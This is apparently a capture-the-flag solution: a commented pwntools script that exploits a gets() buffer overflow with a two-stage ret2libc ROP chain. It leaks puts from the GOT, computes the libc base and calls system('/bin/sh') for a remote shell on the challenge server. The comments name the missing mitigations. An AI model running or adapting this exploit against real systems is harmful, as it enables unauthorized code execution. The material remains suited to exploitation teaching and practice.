Tags: bufferoverflow ret2libc ropchain
Rating:
Buffer Overflow, Standard Return2Libc
```
#!/usr/bin/python
# Python 2 pwntools script (print statement, iterator .next(), str payloads).
# Two-stage ret2libc: stage one leaks puts@GOT and stashes "/bin/sh" in .bss,
# stage two returns into libc's system() with that string as the argument.
# The chain only works because addresses taken from e.symbols/e.plt are fixed
# (binary is not PIE) and the 56-byte overwrite reaches the saved return
# address without a stack canary in the way; an unbounded gets() is the root
# cause. A bounded read (fgets/fgets-style length checks), stack protector,
# PIE, and full RELRO would each remove a link of this chain.
from pwn import *
context(os='linux',arch='amd64')
# DEBUG echoes every byte sent/received, handy for checking the leak parsing.
context.log_level = 'DEBUG'
#p = process('./return-to-what')
p = remote('chal.duc.tf', 30003)
# Challenge binary and the libc it is linked against (used for symbol offsets).
e = ELF('./return-to-what')
libc = ELF('./libc.so.6')
# Padding from the start of the overflowed buffer up to the saved return
# address (56 bytes: buffer + saved rbp — presumably; confirm with a cyclic pattern).
JUNK = "A"*56
main = e.symbols['main']           # re-entered after the leak for stage two
gets = e.plt['gets']               # used inside the chain to read "/bin/sh" into .bss
plt_puts = e.plt['puts']
got_puts = e.got['puts']           # holds puts' resolved libc address -> the leak
# First "pop rdi; ret" gadget in the binary; .next() is Python 2 (next(...) in 3).
pop_rdi = e.search(asm('pop rdi; ret')).next()
# Writable scratch area well inside .bss for the "/bin/sh" string.
bss = e.get_section_by_name('.bss')["sh_addr"]+1500
# Stage one ROP chain:
#   gets(bss)        -> reads the next line we send into .bss
#   puts(got_puts)   -> prints the libc address of puts (the leak)
#   main             -> restart the vulnerable function for stage two
payload = JUNK + p64(pop_rdi) + p64(bss) + p64(gets) + p64(pop_rdi) + p64(got_puts) + p64(plt_puts) + p64(main)
p.recvuntil("to?\n")
p.sendline(payload)
# Consumed by the gets(bss) call in the chain above; the NUL terminates the string.
p.sendline("/bin/sh\x00")
# puts prints the address bytes followed by '\n'; strip it and pad to 8 bytes
# before unpacking as little-endian u64.
leak = u64(p.recvline().strip().ljust(8,"\x00"))
print hex(leak)
libc_puts = libc.symbols['puts']
libc_system = libc.symbols['system']
# libc base = leaked runtime address of puts - its offset inside libc.so.6
lba = leak - libc_puts
# Stage two: system("/bin/sh") with rdi pointing at the string stored in .bss.
payload = JUNK + p64(pop_rdi) + p64(bss) + p64(libc_system + lba)
p.recvuntil("to?\n")
p.sendline(payload)
p.interactive()
```